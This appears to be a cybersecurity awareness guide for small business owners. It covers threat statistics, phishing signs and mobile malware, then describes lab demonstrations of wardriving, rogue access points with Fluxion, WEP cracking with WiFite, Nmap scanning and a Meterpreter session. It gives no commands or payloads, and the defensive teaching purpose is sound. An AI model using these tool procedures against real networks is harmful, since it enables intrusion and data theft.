You are on page 1of 31

Introduction

Business owners know potential customers are connected to the Internet at home, work

and on the go. Smart phones, tablets, laptops, desktops, televisions, gaming consoles,

automobiles, appliances are all devices that connect people, and their money, to a world-wide

market. Just as the Internet changed the game for businesses, it also opened the world up for

attack by new breed of cyber-criminals. These hackers use the Internet from remote locations

to attack networks and devices all over the world.

Over the years, criminals have preferred to target businesses over individuals because

they have more profitable information to steal. The evening news is filled with stories of data

breaches and corporations being attacked, for data such as credit card numbers, social security

numbers and financial institution information. But over the last few years, hackers have realized

that large companies are investing heavily in cybersecurity by implementing the latest intrusion

detection technology and hiring teams of information security professionals to protect their data,

devices and networks. That realization has placed new targets in their sights, the small business.

According to customer surveys conducted by Towergate Insurance (2017), 97% of their

small business customers did not make improving online security a priority, 82% do not think

they are targets of attackers because they dont have anything worth stealing, 32% do not believe

they will suffer revenue loss for a days worth of being down after an attack, 31% dont have an

action plan to respond to security breaches, 24% think cyber security costs too much, and finally,

22% admit they wouldnt know where to start when it comes to implementing security.
Why are small businesses targets of cyber-crime?

Do most small business owners know they are now the main target? The answer is a

resounding, no. In an article discussing the rise of attacks targeting small businesses, Smith

(2016) points out that cyber security experts says that one of the most dangerous phrases used by

small businesses is: Itll never happen to us. In this years Internet Security Threat Report by

Symantec (2016), it was found that three out of every five cyber-attacks targeted small

businesses. That is a huge increase and looking at the data from Symantec over the last five

years, criminals are focusing more and more on small business for their targeted attacks.

It is easy to understand why many small businesses feel they wouldnt be targeted. They

believe they are too small and hackers would not be interested in what they do, when the

opposite is true. Hackers know that small businesses tend to have lower defenses than larger

corporations. By their very nature, thriving small businesses are innovative and niche, which

again is very attractive to the bad guys who may be interested in customer data and intellectual

property and know exactly how to pick out the weak targets.
Why should small businesses secure their network and devices?

Examples of small businesses getting hacked with disastrous results are discussed in an

article from My Digital Shield (2015). The first example covers a NYC mannequin maker who

had more than $1.2M stolen from its accounts as the result of a hack into online transactions.

The company kept getting error messages when it tried to make online payments and didnt

realize the site they were trying to pay on was a spoofed copy of the actual website and payments

were being taken and dispersed into four other banks, then other banks from there.

Another example describes the owner of two small magazine shops in Chicago, who was

notified from a credit card company that a data breach had sent their customers credit card

information to Russia. Who would want to break into us? the owner asked, after determining

that the breach cost his business almost $22,000.

A Bellingham, Washington burger joint business owner was hacked twice over a two

year period, due to the lack of any security tools or configurations. The credit card company

shut off his account and seized money from incoming payments and the owner was forced to

close, even after spending $12,000 for an investigation and remediation payments.

According to the U.S. Department of Health & Human Services (2010), the theft of a

single unencrypted laptop led to a small Massachusetts provider having to settle a case for $1.5

million for violating HIPAA privacy and security rules. Data breaches cost much more than just

money by damaging reputations. Losing trust could not only cost partners and customers, but

future customers and business partnerships.


What threats do small businesses face from cyber-criminals?

The main goal of this Cyber Security Awareness Guide is to give the small business

owners an educational reference to help protect their company and its assets. Simply being

aware that the business is targeted for attack and knowing methods of attackers will reduce the

chances of a successful breach.

Malware Malware is a broad term that covers several types of computer code which

has malicious intent that focuses on destroying something on a computer or stealing data.

Malware is often introduced to a system via email attachments, imbedded in software

downloads or unpatched operating system vulnerabilities. Some examples are:

o Trojan - A Trojan horse or Trojan is often disguised as legitimate software,

commonly a file that has the same name of an operating system file it replaced.

o Virus A computer virus spreads by copying of itself into program files,

spreading from one computer to another, infections systems and flooding

networks as it travels. Almost all viruses are attached to an executable file, which

means the virus may exist on a system but will not be active or able to spread

until a user runs or opens the malicious host file or program.

o Worm - Computer worms are similar to viruses in that they replicate copies of

themselves and can cause the same type of damage, but do not require a host

program to spread.

o Spyware Spyware is malware generally attached to downloadable files without

the users knowledge to capture keystrokes, passwords, or other data.


Example: Ever see a popup prompting that the system has been infected and

software needs to be downloaded to clean it? Or a popup stating

Congratulations, you have won a free.

These are traps used by hackers, many times embedding software into websites

most users should avoid, such as free movie or music download website. If a

user isnt aware, they could panic install the real malware payload and basically

give away control of their own system, thinking they were fixing a problem when

they just made it far worse.


Phishing - Phishing is the attempt to gather items such as usernames, passwords, credit

card numbers or other sensitive information by presenting a malicious link in a seemingly

legitimate email. The best way to combat against phishing techniques is to learn how to

recognize them.

Examples: One of the most popular email phishing schemes is spoof what looks like an

official email from a prominent bank. It happens so often that Bank of America (2017),

in order to protect its customers and others, set up an Online Banking Email Fraud page

on their website to warn of this malicious activity:


According to PhishTank (2016), here are some things to look for in a phishing email:

1. Generic greeting. To save time, Internet criminals send phishing emails in large batches

and use generic names like Security Alert or Generic Bank Name Customer" so they

don't have to type all recipients' names out and send emails one-by-one.

2. Spoofed link. Even if a link has a recognizable name, it doesn't mean it links to a real

organization. Roll the mouse over the link and see if it matches what appears in the email.

If there is a discrepancy, don't click on the link. Also, websites where it is safe to enter

personal information begin with "https" the "s" stands for secure. If "https" is not seen,

do not proceed.

Example:
3. Links to fake account pages. The point of sending phishing email is to trick someone

into providing personal information. If an email requesting personal information is

received, it is most likely a phishing attempt. In this sample, an email would send

someone to a fake Google page in order to steal their login name and password. This is

also done with fake banking pages, social media sites like Facebook or Twitter.

Example:

4. Sense of urgency. Internet criminals try to illicit personal information quickly by trying

to convince a user into thinking something happened that requires and immediate

response. The faster they get the information, the faster they can move to another victim.
Password Attacks: There are several types of password attacks:

o Fake websites: Spoofed sites that look real, but are not. Often a user will click on

a link in an email, website or even in a social media messenger the re-directs them

to a fake page that looks very real.

o Brute-force Program guesses passwords until the hacker gets in. Uses programs

to try combinations of various dictionary words. Cain and Abel is a Brute Force

password cracker. Should a thief steal a laptop, it would be easy to boot from a

USB drive running hacking tools to run this program, which would grab all of the

local passwords for easy logon.


Mobile Smart Devices The New Threat

Over the years, the primary targets of hackers have been the servers, desktops and

laptops of businesses, because they have been the primary devices connected to the

Internet. In much the same way cyber-criminals redirected their attack focus from large

businesses to small, cybersecurity analysts say nefarious forces are increasingly turning

their attention to the most personal computer one owns, the device carried everywhere

and trust with some of the most sensitive secrets, the mobile smart device.

Over the last two years or so, we have seen a huge influx in the number of

hackers targeting smartphones, says Roel Schouwenberg, principal security researcher for

Kaspersky Labs, to CBC News (2014) in a story discussing how these devices are

becoming prime target for criminal hackers.

Mobile smart devices are small electronic gadgets that put the power of a

computer in the palm of a hand, connected to other devices or networks via wireless

protocols such as Bluetooth, NFC, Wi-Fi, and 3G/4G cellular services. Smartphones and

tablets carry the most personal and financial information of the small business owner

contained in contacts lists, online shopping, mobile banking and credit card apps.

Internet access via a mobile smart device allows small business owners to access

cloud storage, where they could store important business documents, contracts, bids,

service level agreements and much more. Many small business owners also use

smartphones and tablets to process credit cards using 3rd party magstripe and smartchip

readers and installed mobile apps. The breech of one of these device by criminals would

be devastating to a small business and their customers.


Hackers have started targeting these devices in several ways. Sometimes it is

malware implanted using the same email attacks directed at personal computers, being

delivered via mobile email apps. SMiShing (SMS phishing) is another common attack

method, sending an SMS text with what looks like account notifications, in the hopes the

device owner will click on the link and receive a virus download to the phone.

In a review of the Mobile Malware Evolution 2016 by Unuchek (2017), it was

reported that Kaspersky Labs detected 8,526,221 malicious installation packages,

128,886 mobile banking Trojans and 261,214 mobile ransomware Trojans.

The trends of 2016 were:

o Growth in the popularity of malicious programs using super-user rights, primarily

advertising Trojans.

o Distribution of malware via Google Play and advertising services.

o Emergence of new ways to bypass Android protection mechanisms.

o Growth in the volume of mobile ransomware.

o Active development of mobile banking Trojans.


This year, Unuchek (2017) of Kaspersky Labs reported they have started

calculating the distribution of mobile software based on number of detected installation

packages.

In 2016, the volume of Mobile Trojan-Ransomware increased noticeably both in

the number of users attacked as well as installation packages detected


Latest Hacking News (2017) posted an article showing images of Samsung

Galaxy S7 hacked with Ransomware, where victim was infected while using the popular

Facebook Messenger app. A penalty notice warned the victim that they would be

reported as having sexual child abuse content on the phone unless a ransom was paid via

secure online payment platform, PaySafeCard.

Physical Access

What if a thief break into a small business owners car or home and steals their

laptop? What if a criminal has gained access to a home office via break-in or social

engineering tactics such posing as city inspector, a gas company employee claiming there

is a gas leak or a person from the cable company here to fix the wireless problem that

he created by jamming the wireless access point.

Even if a computer has a password, that doesnt mean a hacker wont be able to

get to the data. Simply inserting and booting from a USB key would grant access to a

computer that hasnt been properly configured and encrypted.


Once the computer has been booted via USB, the attacker has full access to the

hacking toolkit included, as well as all of the files contained on the hard drive.

Here we see access all the way down to the Documents folder containing vital

working documents to our small business owner. These can be copied to the USB drive

for later review. The hacker can also embed malware into the system or any of the files

on the system, and if they are emailed to another location, the hacker has a backdoor in.
If granted physical access to a device, hacker could place a keylogger into an

open USB port, plant a wired or wireless server or boot into an unencrypted laptop or

desktop to steal data. Many criminals use social engineering skills to put themselves into

positions which allow physical access, such as posing as cable installers, maintenance

personnel, telephone or power workers or potential customers. Physical security is every

bit as important as cybersecurity.

o Keyloggers - Track keystrokes, to include User IDs and passwords by emulating

combinations of trusted USB devices, such as gigabit Ethernet, serial, flash

storage and keyboards, computers are tricked into divulging data, taking

documents, installing backdoors and many more exploits.

Would the common computer user notice this little key grabber plugged in

between the computer and keyboard?


The Hak5 Bash Bunny, the latest and greatest keylogger, is capable of carrying

multiple payloads. Plugged into a long cable connected to a USB port in the back

of a computer case, easily hidden and unnoticed.

A Raspberry Pi Zero W (right) with Kali Linux is a portable, fully operational

hacking PC. Easily hidden in an office, running wirelessly, this devices can

access information on the machine and transmit it over the Internet anywhere in

the world. Running PoisonTap (left) can hack locked workstations.


Examples of real hacking techniques.

The most effective way to demonstrate weaknesses to a small businesses is to use the

same mindset, tools and methods of cybercriminals and hackers. This guide demonstrates

how devices and networks are compromised by attacking systems set up to mirror the same

environment many home-based businesses use to conduct their day to day business.

Attacking the Network

Find the target with WarDriving: Using a laptop connected to a wireless adapter and a

USB GPS receiver is an old school, tried and true way of allowing a hacker to drive

around in a vehicle, surveying the area for wireless networks and evaluating their

security.

A more modern technique is to use a smartphone, as they come with wireless and

GPS built in. The collected information is stored in a database for later analysis. The data

can be sorted and imported into a mapping application like Google Earth for hackers to

have a roadmap or uploaded to websites where hackers collaborate and share information

with each other.

This information is then publicly available, not just for hackers, but people

looking for open access points to download or upload illegal content or spam email.

When the authorities conduct their investigations, the trail will lead to some innocent

home or business owner instead of the perpetrator.

Wireless Password Theft Password theft on wireless networks generally are achieved

in two ways:
o Fluxion- Wireless Access Point Spoofing: Spoofing works by presenting users

with what looks like a legitimate Wireless Access Point (WAP), when in reality

its just a laptop with two wireless cards playing man in the middle. The rogue

WAP presents what appears to be the real SSID and tricks them into connecting to

it. Once the user enters the password to connect, it is stored by the hacker.

o WiFite - Brute Force Cracking: The stealthy way to crack wireless password is

to capture real network traffic between a legitimate user and the WAP. The

cracking tool sends a signal to a client which kicks it off of the wireless network,

then captures the encrypted packets when it authenticates. Those packets are

then taken back to a more powerful computer, where it runs brute force tools

against dictionary lists to discover.

Footprinting: Once the hacker has access to the internal network, the information

gathering begins by using scan tools to find the devices. Once the devices are detected,

tools are run to find the Operating System type so targeted payload attacks can be

launched. NMAP is the tool used to find devices and determine the operating system.

Attack Systems: Attack system with live exploits to gain access by delivering a payload

that lets a hacker control the system. The demonstration will cover the AFTER attack so

as to not spread live attack


WarDriving Demonstration: Kismet

A Kali Linux laptop running Kismet connected to a TP-Link wireless adapter and

a GlobalSat USB GPS receiver, WarDriving a neighborhood to collect wireless access

point information and their GPS locations.

The collected data can be extracted from the wardriving database and imported into a

mapping program like Google Earth.


Modern wardrivers keep it simple, using their smartphones that come with

wireless and GPS built in. While not getting the same range as the old school laptop, using a

smartphone running WiGLEWiFi is far more discrete and effective.

Once the data is captured, it can easily be uploaded to wigle.net, a site used by wardrivers

to collaborate and share captured data.


Wireless Access Point Spoofing Demonstration: Fluxion

Fluxion is used to trick a user into giving away their password by capturing information

from a real wireless access point, then jamming it while putting up a fake access point for the

victim to enter their password. In this demonstration, Fluxion has targeted SmallBizDemo

The target wireless access point has been identified, once the deauth command is sent, the

android device will be kicked from the real access point.


When the device tries to reconnect, it will send an encrypted handshake that is then

captured by fluxion when it tries to reconnect to the real WAP.

When the check handshake option is checked, the information gathered from the WAP is

displayed. Then a fake access point is created with the information gathered, jamming the

original access point while presenting the client with a spoofed SSID.
When presented with the fake WAP, the victim will attempt to enter the ACTUAL

password, thinking they are attaching to the real AP.

Fluxion will compare the password captured from the victim to the captured encrypted

handshake and verify the password is authentic.


Brute Force Cracking Demonstration: WiFite

WiFite is an automated wireless attack tool which can mount multiple wireless access point

attacks against WEP and WPA encryption. WiFite excels at:

sorting targets by signal strength cracking closest access points first

automatically de-authenticating clients of hidden networks to reveal SSIDs

filtering to specify exactly what to attack WEP, WAP or both

anonymous feature, changing MAC to a random address before attacking, then

changes back when attacks are complete

smart WPA de-authentication, cycles between all clients and broadcast deauths

displays session summary at exit, shows cracked keys

all passwords saved to cracked.txt

Start WiFite and chose a network adapter capable of monitor mode.

When monitoring starts, a list of access points will be presented, in this case the

SmallBizDemo wireless access point will be the target of attack.


In just minutes, the WEP encryption key is attacked and captured, demonstrating how

easy it is to break WEP.


Footprinting: Gathering information about the target by using scan tools against network

and system ports with NMap. The process begins by running NMap on the exploited

network to gather information about systems, but scanning the entire subnet. .

The HP computer with the IP of 10.0.0.6 will be the target, as it is probably a Windows

computer. Running NMap against the IP address confirms the suspicion

.
Now that a target has been chosen and an often exploitable operating system has been

found, the attack methods will change to target specific attack methods the system over the

wireless network.

Attack Systems: Attack system with live exploits to gain access by delivering a payload

that lets a hacker control the system. The demonstration will cover the AFTER attack so

as to not spread live attack methods and techniques.

Once the attack has occurred and the backdoor into the system is opened, the hacker has

complete Meterpreter shell access was well as his complete hacking toolkit. This screenshot

shows the exploit running in a background process on the target computer and has opened a

session back to hacking system on 10.0.0.18.


Here the attacker is connected and in the root of C: drive. Change directories to

Users\Mama\My Documents would grand access to the same small business owner files shown

above in the physical access attack. Except this time, the hacker is sitting in his car across the

street, free of fear of getting caught.

With this kind of remote access, the attacker can launch any number of attacks on the

small business owner. He could inject other malware to infect customers or partners of the

business, hijack the system with Ransomware by encrypting the hard drive and locking the

owner out.
The screenshot below offers a scary option to a cybercriminal with the Webcam

commands. What kind of compromising material can be capture by snapping pictures or starting

a video stream by activating the web camera?

If a business suspects that it has been the victim of a Cyberattack:

Inform local law enforcement or the state attorney general.

Report stolen finances/identities and other cybercrimes to the Internet Crime Complaint

Center: http://www.ic3.gov/

Report fraud, identity theft, scams or rip-offs to the Federal Trade Commission:

http://www.onguardonline.gov/file-complaint

Report computer or network vulnerabilities to US-CERT via the hotline: 1-888-282-0870

or the US-CERT website: http://www.us-cert.gov/


Recommended Reading

New NIST Guide Helps Small Businesses Improve Cybersecurity

https://www.nist.gov/news-events/news/2016/11/new-nist-guide-helps-small-businesses-

improve-cybersecurity

Federal Communications Commission Cybersecurity for Small Business

https://www.fcc.gov/general/cybersecurity-small-business

NIST - Small Business Information Security: The Fundamentals

https://doi.org/10.6028/NIST.IR.7621r1

U.S. Small Business Administration Cybersecurity Resources for Small Business Owners.

https://www.sba.gov/content/introduction-cybersecurity

Department of Homeland Security: Stop. Think. Connect. Small Business Resources

https://www.dhs.gov/publication/stopthinkconnect-small-business-resources

US Computer Emergency Readiness Team: Resources for Small Businesses

https://www.us-cert.gov/ccubedvp/smb
National Cyber Security Alliance

https://staysafeonline.org/

'Ransomware' scam leaves victims powerless

http://www.wsmv.com/story/27732818/ransomware-scam-leaves-victims-powerless

Images of Samsung Galaxy S7 hacked with Ransomware

https://latesthackingnews.com/2017/03/27/images-samsung-galaxy-s7-hacked-ransomware/